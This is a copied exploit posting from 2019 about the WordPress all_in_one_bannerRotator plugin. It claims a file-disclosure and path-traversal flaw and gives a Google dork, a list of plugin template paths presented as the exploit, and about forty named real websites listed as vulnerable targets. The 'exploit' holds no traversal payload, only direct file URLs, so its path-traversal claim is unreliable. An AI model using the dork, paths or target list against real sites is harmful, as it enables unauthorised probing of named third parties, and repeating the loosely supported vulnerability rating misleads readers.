facebook facebook twitter rss

WordPress all_in_one_bannerRotator Plugins 4.9.9 File Information Exposure

Author: KingSkrupellos , Published: 18-01-2019
###############################################################################

# Exploit Title : WordPress all_in_one_bannerRotator Plugins 4.9.9 File Information Exposure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : lambertgroupproductions.com ~ responsivejqueryslider.com
# Software Download Link : downloads.wordpress.org/plugin/all-in-one-slider.zip
# Software Information Links : responsivejqueryslider.com/banner_rotator.html
+ responsivejqueryslider.com/wordpressplugin/banner_rotator_responsive.html
+ codecanyon.net/item/all-in-one-slider-responsive-jquery-slider-plugin/1534434?ref=LambertGroup
+ lambertgroupproductions.com/portfolio_page/one-slider-responsive-jquery-slider-plugin/
# Software Price : 11$
# Tested On : Windows and Linux
# Category : WebApps
# Affected Versions : 1.1 - 3. 0 - 3.2 - 3.5.0 - 4.7.12 - 4.9.9
# Exploit Risk : High
# Google Dorks : inurl:"/wp-content/plugins/all_in_one_bannerRotator/"
# Vulnerability Type : CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]

###############################################################################

# Impact :
***********

* WordPress all_in_one_bannerRotator Plugins 4.9.9 and other versions is prone to an arbitrary file disclosure

vulnerability because it fails to properly sanitize user-supplied input.

* An attacker can exploit this vulnerability to view local files in the context of the web server process,

which may aid in launching further attacks.

* An information exposure is the intentional or unintentional disclosure

of information to an actor that is not explicitly authorized to have access to that information.

* The product stores sensitive information in files or directories that are accessible

to actors outside of the intended control sphere.

* The software uses external input to construct a pathname that is intended to identify a file or

directory that is located underneath a restricted parent directory, but the software does not

properly neutralize special elements within the pathname that can cause the pathname

to resolve to a location that is outside of the restricted directory.

###############################################################################

# Video Tutorials =>
*******************

Step 1: Installation – youtube.com/watch?v=D8rQdXzEz0o
Step 2: Manage Images – youtube.com/watch?v=ULrPCuP0rnQ
Step 3: Manage Text Over Image – youtube.com/watch?v=4KqgWBmx8RA
Step 4: Manage Multiple Banners – youtube.com/watch?v=y2wnD3hUdus

###############################################################################

# Exploit :
*************

/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php?page=all_in_one_bannerRotator_Manage_Banners

/wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php

/wp-content/plugins/all_in_one_bannerRotator/tpl/banners.php

/wp-content/plugins/all_in_one_bannerRotator/tpl/help.php

/wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php

/wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Add_New

/wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Manage_Banners

/wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Help

/wp-content/plugins/all_in_one_bannerRotator/tpl/playlist.php

/wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php?page=all_in_one_bannerRotator_Playlist

/wp-content/plugins/all_in_one_bannerRotator/tpl/playlist_elements_over_image.php

/wp-content/plugins/all_in_one_bannerRotator/tpl/preview.html

/wp-content/plugins/all_in_one_bannerRotator/tpl/settings_form.php

###############################################################################

# Example Vulnerable Sites :
****************************

[+] amf-lebanon.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php

[+] hotel-le-verseau.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] wolfetours.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] sklawfirm.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] ecolestetiennedeseaux.fr/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] warrentonfamilydentistry.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] icaran.cl/headhunters/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] oha.net.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] neostrata.ie/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] dash.gr/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] mydebtadvisors.com/dev/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] downtoearthlawn.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] marketingdepartmentinc.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] veepraces.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] mvucc.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] thebutlerschool.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] mckannafabs.com.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] susanelanjones.co.uk/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] animalrepro.com/wp-content/plugins/all_in_one_bannerRotator//tpl/add_banner.php

[+] carh.org/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] orsrents.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] trechomes.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] primepowdercoating.com.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] baystateconsultants.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] cardiff-lift.co.uk/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] triplesservices.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] homeleisure.com.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] perryverroneroofing.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] emmaswebsite.com.au/esh/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] viatorians.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] avantec.se/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] bodycorpservices.co.nz/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] ultrafin.co.za/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] smartindia.co.in/influx/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] lejagroup.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] vibrantjersey.je/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] casadovelhodragoeiro.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] triplesservices.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

[+] pegasostravel.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php

###############################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :